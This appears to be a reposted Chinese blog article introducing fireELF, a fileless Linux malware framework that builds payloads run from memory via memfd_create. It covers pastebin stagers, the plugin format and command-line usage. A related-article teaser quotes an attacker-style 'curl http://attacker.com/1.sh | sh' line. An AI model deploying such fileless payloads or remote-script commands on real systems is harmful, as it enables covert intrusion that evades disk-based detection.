linux c恶意代码,fireELF:无文件Linux恶意代码框架

最新推荐文章于 2022-03-05 16:10:01 发布
最新推荐文章于 2022-03-05 16:10:01 发布
阅读量130 收藏
点赞数
文章标签: linux c恶意代码

fireELF是一个开源的跨平台无文件Linux恶意代码框架,它允许用户轻松的创建和管理payloads。默认情况下附带了'memfd_create',这是一种从内存中完全运行linux elf可执行文件的新方法。

截图

b1cbe7e8ec931798ac28ae6a32a6559b.png

ab25eae9494f8e016b2d963cbf778992.png

特性选择并构建payloads

能够缩小payloads

能够通过将payloads上传到pastebin来缩小payloads,然后创建一个与python <= 2.7兼容的非常小的stager

输出已创建的payloads到文件

能够从URL或本地二进制文件创建payloads

包含的 payload memfd_create

这是一个linux系统的底层调用函数,它在内核3.17中引入,会创建一个匿名文件并返回一个文件描述符指向它,该文件表现和常规文件类同, 可以进行修改,截断,内存映射等等,但不同的是,它存在于RAM当中。这就是可以被攻击者所利用的,如果有办法将需要执行elf通过memfd_create写入内存中进行执行的话就可以达到我们的目的。

创建 Payload

除此之外,用户还可以开发自己的payload。默认情况下,payload存储在payloads/下,想要创建有效的payload,你只需include一个名为'desc'的dictonary,其参数为'name','description','archs'和'python_vers'。示例如下:desc = {"name" : "test payload", "description" : "new memory injection or fileless elf payload", "archs" : "all", "python_vers" : ">2.5"}

除了'desc' dictonary之外,我构建的插件引擎使用的entry point(入口点)需要一个main函数,它将自动传递两个参数,一个是布尔值,如果为真则意味着它传递了一个url,第二个参数传递的是数据。以下是一个简单入口点的示例:def main(is_url, url_or_payload):

return

安装

依赖项安装:pip3 -U -r dep.txt

fireELF是在Python 3.x.x中开发的。

使用usage: main.py [-h] [-s] [-p PAYLOAD_NAME] [-w PAYLOAD_FILENAME]

(-u PAYLOAD_URL | -e EXECUTABLE_PATH)

fireELF, Linux Fileless Malware Generator

optional arguments:

-h, --help 显示帮助信息并退出

-s Supress Banner

-p PAYLOAD_NAME 使用的PAYLOAD名称

-w PAYLOAD_FILENAME 要写入PAYLOAD的文件的名称(强烈建议,如果你没有使用Paste Site选项)

-u PAYLOAD_URL 要执行的payload url

-e EXECUTABLE_PATH 可执行文件的位置

*参考来源:GitHub,FB小编secist编译,转载请注明来自FreeBuf.COM

weixin_39609822
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
手工搭建简易的Linux恶意脚本分析系统
安全杂货铺
08-21 741
概述 Linux环境下的恶意软件大部分以shell脚本作为母体文件进行传播,而且,同一个病毒家族所使用的的恶意脚本往往具有极高相似性,新变种的脚本大部分是在旧变种脚本的基础上进行修改,新增或替换部分关键恶意代码,同时,不同家族之间的恶意脚本也可能出现代码互相借鉴,部分重合的情况。 该如何揭示病毒家族中恶意脚本之间的关系呢?接下来,我们就通过手工搭建一个简易的恶意脚本分析系统,来实现对恶意脚本之间关系的研究。 系统的功能如下,主要为3个: [1] 使用yara检测脚本对应的病毒家族。 [2] 计算脚本与样本库
linux svn 拉取代码_linux下svn的常用代码
weixin_39857899的博客
12-22 3226
1、将文件checkout到本地目录svn checkout path(path是服务器上的目录)例如:svn checkout svn://192.168.1.1/pro/domain简写:svn co2、往版本库中添加新的文件svn add file例如:svn add test.php(添加test.php)svn add *.php(添加当前目录下所有的php文件)3、将改动的文件提交到版...
fireELFfireELF-无文件Linux恶意软件框架
02-04
火精灵 fireELF是跨平台的开源无文件Linux恶意软件框架,允许用户轻松创建和管理有效负载。 默认情况下,它带有“ memfd_create”,这是一种完全从内存运行linux elf可执行文件的新方法,而无需二进制接触硬盘驱动器。 屏幕截图 产品特点 选择并建立有效载荷 最小化有效载荷的能力 通过将有效载荷源上传到pastebin来缩短有效载荷的能力,然后创建一个与python <= 2.7兼容的非常小的stager,从而易于部署 将创建的有效负载输出到文件 能够从URL或本地二进制文件创建有效负载 包含的有效负载memfd_create 唯一包含的有效负载“ memfd_crea
linux文件渗透执行elf
whatday的专栏
08-13 1283
01—简介 在进行Linux系统的攻击应急时,大家可能会查看pid以及/proc相关信息,比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令,通过/proc/$pid/exe抓样本等,但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢?最近看了一篇@MagisterQuis写的文章h...
使用FD_CLOEXEC实现close-on-exec,关闭子进程无用文件描述符
hunanchenxingyu的专栏
05-07 5685
通过fcntl设置FD_CLOEXEC标志有什么用?    close on exec, not on-fork, 意为如果对描述符设置了FD_CLOEXEC,使用execl执行的程序里,此描述符被关闭,不能再使用它,但是在使用fork调用的子进程中,此描述符并不关闭,仍可使用。   通过fcntl设置FD_CLOEXEC标志有什么用? close on exec, not on-
Windows恶意代码剖析实验
08-01
运用OD(动态分析工具)、IDA(静态分析工具)、PEid(查壳工具)等工具对window恶意代码进行具体分析
linux恶意代码检查软件,Yara:恶意软件检测神器
weixin_33249090的博客
05-11 808
yara是一款用于帮助软件研究人员检测恶意软件和代码的开源工具,可以分析各种文件以及正在运行的进程。Yara支持的系统平台Yara工具自带了一个小型的搜索引擎,可以在window、linux、MacOS系统上运行,而且支持python扩展,允许通过python脚本访问搜索引擎。Yara的使用构成:Yara的使用由三部分构成:yara工具、规则文件、目标文件(进程)yara工具我在yara工具的安装...
Linux C语言实现配置文件的读写
布鲁克的小溪流
03-05 4183
C语言实现配置文件的读写。 文件名 作用 global.h 定义一些宏 Func.h 公用函数头文件 Func.c 公用函数的实现 config.h 读写配置文件的函数声明 config.c 读写配置文件的函数实现 config_main.c 主函数入口 config.conf 配置文件 直接上代码,一些解释以注释的形式写在了相应的文件里面。 // 文件名:global.h #ifndef __GLOBAL_H__ #define __GLOBAL_H__ #def
Linux下提示bash:command not found解决方法小结
热门推荐
C/C++攻城狮
04-19 37万+
0x00 前言 文章中的文字可能存在语法错误以及标点错误,请谅解; 如果在文章中发现代码错误或其它问题请告知,感谢! 0x01 解决方法 我们在使用linux开发编译的时候可能会遇到: 1.前几次还好用的命令,这次再输入就出现-bash: ***: command not found的情况; 2.第一次使用就出现 -bash: ** : command not found的情况。 导致这种问题的原...
linux_qq.rar_C语言_Linux C语言_linux_linux c语言代码_linux聊天QQ
09-21
linux局域网聊天工具原代码,c语言编写
linux、c语言贪吃蛇项目代码文件
06-16
贪吃蛇代码
linux安装防恶意代码的软件,Linux系统对付恶意软件的三款应用软件
weixin_36316102的博客
05-03 2634
原标题:Linux系统对付恶意软件的三款应用软件 即使你使用Tripwire,也应该意识到恶意攻击者仍会在你不知情的情况下在系统上植入恶意软件。在本文中,你将学习如何安装和运行三款不同的反恶意软件应用软件:chkrootkit、rkhunter和ClamAV,它们可以帮助你的系统远离恶意软件。在尝试修复恶意软件感染之前,切换至单个用户模式,确保恶意攻击者不会察觉你的活动,或无法掩盖其行踪。1.ch...
linux恶意代码实验报告,如何在CentOS 7上安装Linux恶意软件检测(LMD)和ClamAV
weixin_34966346的博客
05-13 1293
Linux恶意软件检测(LMD)是用于Linux的恶意软件检测器和扫描仪,专为共享托管环境而设计。 LMD是根据GNU GPLV2许可证发布的,它可以安装在cPanel WHM和Linux环境中,并配有其他检测工具,如ClamAV。Clam AntiVirus(ClamAV)是一种开源的防病毒解决方案,用于检测木马,恶意软件,病毒和其他恶意软件。 ClamAV支持多种平台,包括Linux,Wi...
linux关闭恶意程序,如何使用命令行对无文件恶意软件进行取证
weixin_34651547的博客
05-02 469
前言在最近的几年,Linux面临的一个日益严重的威胁—-基于无文件落地型的恶意软件。无文件恶意软件是指将自身注入到正在运行的Linux系统中,并且不会在磁盘上留下任何痕迹。现在已经有多种手法可以实现无文件攻击:1.执行二进制文件后从磁盘删除自身。2.在不写入磁盘的情况下直接将代码注入正在运行的服务器(例如,在PHP服务器通过易受攻击的输入来运行PHP代码)。3.使用诸如ptrace()之类的系统调...
恶意代码
qq_61227844的博客
12-28 1293
· 计算机病毒(Computer Virus) · 具有自我复制能力并会对系统造成巨大破坏的恶意代码 · 蠕虫(Worms) · 特洛伊木马(Trojan Horse) · 与远程主机建立连接,使得远程主机能够控制本地主机 · 逻辑炸弹(Logic Bombs) · 系统后门(Backdoor) · 绕过安全控制而获取对程序或系统访问权 · Rootkit · 恶意脚本(Malicious Scripts) ...
餐厅点餐系统springboot.zip
09-10
开发一个基于Spring Boot的餐厅点餐系统可以大大提高餐厅的服务效率和顾客体验。下面是一个简单的案例程序,展示了如何使用Spring Boot来构建这样一个系统。这个系统将包括用户管理、菜单管理、订单管理等基本功能。 1. 创建项目 首先,通过Spring Initializr(https://start.spring.io/)创建一个新的Spring Boot项目,并添加必要的依赖项,如Web、Thymeleaf、Spring Data JPA 和 MySQL Driver。
MATLAB_SIMULINK中的病毒传播模拟器.rar
09-10
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
Sigrity-Sigrity MCP Specification.rar
最新发布
09-10
Sigrity-Sigrity MCP Specification.rar 当引脚名称映射失败时,通过坐标映射为替代引脚映射方法添加可选的引脚坐标(相对于元件原点)。 本文档描述了信号模型连接协议(MCP)。 MCP用于在管芯(芯片)、封装和PCB之间连接电路模型和/或物理布局。 MCP允许任何MCP型号的Sigrity产品内的自动模型和结构连接。 它还允许第三方工具将Sigrity模型与MCP集成或连接。 MCP使用简单的ASCII格式,支持模型连接的多个电路和引脚,并允许将物理引脚集中在电路模型中。 MCP具有可扩展性和向后兼容性。
智能优化算法-樽海鞘优化算法(SSA)
09-10
樽海鞘优化算法 (Salp Swarm Algorithm, SSA) 虽然名称中提到的是“樽海鞘”,但实际上这个算法是基于群体智能的一种元启发式优化算法,它模拟了樽海鞘(Salps)在海洋中的游动和觅食行为,用于解决复杂的优化问题。 SSA的工作机制主要包括以下几个方面: 链式游动:模拟樽海鞘在海洋中形成链状结构进行集体游动,用于探索解空间。 觅食行为:通过模拟樽海鞘的觅食行为,促进算法的局部搜索能力。 动态调整:根据当前搜索状态动态调整搜索策略,平衡全局搜索和局部搜索。 优点包括: 强大的探索能力:SSA能够有效地探索解空间的不同区域。 灵活性:适用于多种优化问题,包括连续和离散优化。 快速收敛:通常能够在较少迭代次数内找到较好的解。 易于实现:算法设计直观,易于编程实现。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值